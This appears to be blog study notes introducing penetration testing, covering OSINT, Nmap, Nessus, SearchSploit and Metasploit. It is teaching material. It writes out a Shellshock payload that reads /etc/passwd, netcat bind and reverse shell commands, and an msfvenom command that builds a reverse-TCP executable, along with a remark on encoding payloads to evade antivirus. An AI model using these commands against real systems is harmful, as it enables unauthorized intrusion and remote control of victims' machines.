Introduction to Pen Testing and Open Source Intelligence

What is Penetration Testing?

Penetration Testing: The offensive security practice of attacking a network with the same techniques an attacker would use

Engagement: Practitioner term for penetration tests

Stages of Engagement

  1. Planning and Reconnaissance
  2. Scanning
  3. Exploitation
  4. Post-Exploitation
  5. Reporting

Types of Penetration Testings

No-View Pen Testing

No-View: Simulates a malicious hacker who has no prior knowledge of the target system and network

Testers learn and exploit as much as they can about the network using skill and public knowledge

Full-View Pen Testing

Full-View: Testers are given full knowledge of the system or network

Most appropriate when a client requests a detailed analysis of all potential security flaws

Testers are provided network diagrams, access credentials, system names, and user credentials

Partial-View Pen Testing

Partial-View: Performed by the in-house system or network admin

Main deliverable for testers is a report that summarizes their findings and recommendations for improvements


The specific environment that a pen test takes place in is determined before the test occurs

Businesses are not primarily interested in how attackers might gain access, but rather how an exploited vulnerability might impact their business

Purpose: Determined by the client’s need and concerns, and which assets have a higher priority

Scope: Based on which machines and networks are off limits


Active: Directly engaging with a target system

Passive: Trying to gain information about a target’s system and network without directly engaging with the systems

Open Source Intelligence (OSINT): Information that is publicly available outside of the system, such as usernames, email addresses, phone numbers, and domain names

Google Dorking, Shodan, and Certificate Transparency

Google Dorking

Google Dorking: A technique that leverages Google for OSINT and discovery of security holes in a website’s code

site: can be used to specify a search within a site:


Shodan: A search engine that scans the entire web and reports back all of its findings in the browser window

An IP Address can be provided to Shodan and information such as open ports and vulnerabilities will be provided

Certificate Transparency

Certificate issuers publish logs of SSL/TLS certificates that they issue to organizations provides SSL information for the provided domain


Recon-ng: Web reconnaissance framework created in Python

recon-ng will open the interface

modules search: Lists installed modules

moudles load [module]: Loads module

Network Discovery and Vulnerability Scanning


Nmap (Network Mapper) functions include:

Always get documented permission from the system owner before engaging in any type of network scan

nmap with no arguments will print help content

-T[0-5]: Sets the timing of the scan (higher is faster)

The slower the scan the harder it is to detect

-O: OS discovery:

nmap -O

-sT: Full TCP handshake scan (Syn, Ack, and Ack back)

-sS: Half TCP handshake (Syn, Ack, but not Ack back)

-sV: Version scan, which provides information of the services and versions running on open ports

-sC: Used in combination with a scan to implement a custom script:

nmap -sV -sC -p 3306

-p: Specifies a specific port

-oN: Saves output to a specified file

NSE Scripting

Nnmap Scripting Engine (NSE): Allows users to write and share scripts that automate a variety of networking tasks

Nmap comes with preinstalled sctipts in /usr/share/nmap/scripts

Zenmap: GUI tool for Nmap

To use NSE in Zenmap:

  1. Profile > Edit Selected Profile
  2. Select the Scripting tab
  3. Select Save Changes

Vulnerability Scanning

Nessus: Vulnerability scanner used to identify vulnerabilities and create inventories of all interconnected systems

National Vulnerability Database (NVD): Source of exploit information that grades each vulnerability based on its severity level

To use Nessus:

  1. Start the Nessus service: /etc/init.d/nessusd start
  2. Go to https://kali:8853
    1. username: root
    2. password: toor
  3. Select New Scan
  4. Select Basic Network Scan
  5. Provide a Name and Target
  6. Select Save
  7. Select the Play icon to start the scan
  8. Double-click on the scan to open the scan overview
  9. Select the Report



Shellshock: Remote code execution (RCE) vulnerability that allows attackers to execute arbitrary Bash code on vulnerable targets

Shellshock can:

An example is sending a request that sets the User-Agent to () {:;}; to execute code:

User-Agent: () {:;}; /bin/bash -c 'cat /etc/passwd'


SearchSploit: Utility used to locally store a library of exploit information and the scripts used to execute the exploits

Exploit Database (Exploit-DB): Popular online database that contains publicly disclosed according to their Common Vulnerabilities and Exposure (CVEs) identifier

searchsploit -u: Updates the database

-h: Prints the help prompt

To search for the terms ftp, remote, and file:

searchsploit ftp remote file

-t: Restrict search to specific titles

--exclude: Excludes a provided pattern. | can be used to provide multiple patterns

-w: Includes links to the Exploit-DB website

Syntax to run provided exploit scripts:

python /usr/share/exploitdb/path_to_the_python_script payload=bind rhost=<TARGET IP ADDRESS> rport=<TARGET PORT> pages=/cgi-bin/vulnerable


Heartbleed and SearchSploit

Clients and servers use OpenSSL to encrypt information, and during this process, the client also sends heartbeats to servers

Heartbeats: A call-and-response to make sure that the connection to the server is still alive

An attacker can trick the server into supplying larger dumps of data from its RAM to buffer the message, which can include valuable payloads, like private encryption keys or user credentials

Introduction to Metasploit

Metasploit: A tool suite for hacking servers and other networked devices

MSFconsole: Main interface for Metasplout that offers a centralized console to access all the options and modules

Meterpreter: A shell that Metasploit launches when a successful connection to the target machine is made

Module Types:

msfconsole: Launches Metasploits

search [pattern]: Searches for modules related to the specified pattern:

search java

The modules provided provide their type

use [module]: Loads the specified module:

use auxiliary/scanner/http/apache_mod_cgi_bash_env

While in the module, info will print information about the module and options will just print the available options

Options need to be set in order to run the module:

set TARGETURI /cgi-bin/vulnerable

setg [option] [value]: Sets the option across all module

run: Runs the module

Post Exploitation with Meterpreter

Payloads and Shells

Payload: The shell code that runs after an exploit successfully compromises a system

Staged Payloads: Come in parts in order to minimize their initial payload size

Stageless Payloads: Complete payloads that are significantly larger than staged payloads

Shell: Connection that the payload establishes between the target and attacking machine

Bind Shells: Uses a payload that opens a port on a victim host and listens on that port for an incoming connection from the attacker host

Reverse Shells: Uses payload that automatically reaches back out to the attacker host to establish a session

Bind Shell

  1. Start a listener on the victim machine: nc -lnvp 4444 -e /bin/bash
  2. On the attacker machine, establish the connection: nc [IP_ADDR] 4444

A reverse shell is initiated from the target host to the attacker:

  1. Start a listener on the attacker machine: nc -lvnp 4444
  2. On the victim machine, run the following: nc [IP_ADDR] 4444 -e /bin/bash


Meterpreter is Metasploit’s proprietary reverse shell

Allows to:

Meterpreter session steps:

  1. Exploiting the target
  2. Uploading a Meterpreter payload on the target
  3. Starting a TCP listener
  4. Executing the Meterpreter payload

Meterpreter Basics

Meterpreter Implementations

  1. Create a malicious custom payload: msfvenom -p windows/meterpreter/reverse_tcp lhost=[IP_ADDR] lport=4444 -f exe > hack.exe
  2. Use the metasploit console to set up a listener:
    1. Run msfconsole
    2. Select an exploit module: use exploit/multi/handler
    3. Set the Windows Meterpreter payload: set payload windows/meterpreter/reverse_tcp
    4. Set the following options:
      1. set LHOST [attacker_ip]
      2. set LPORT 4444
    5. Run exploit
  3. Within the victim host, open the payload
  4. Return to metasploit, that should now display meterpreter

Custom Payloads with msfvenom

msfvenom: A metasploit framework tool used to generate and encode payloads

Metasploit does need to be running in order to use msvenom

Encoding: Method used to evade detection tools

Encoding changes the signature of a payload, which creates a new signature with no written rule

This change allows payloads to bypass detection from AV and IDS tools

Leave a Reply

Your email address will not be published.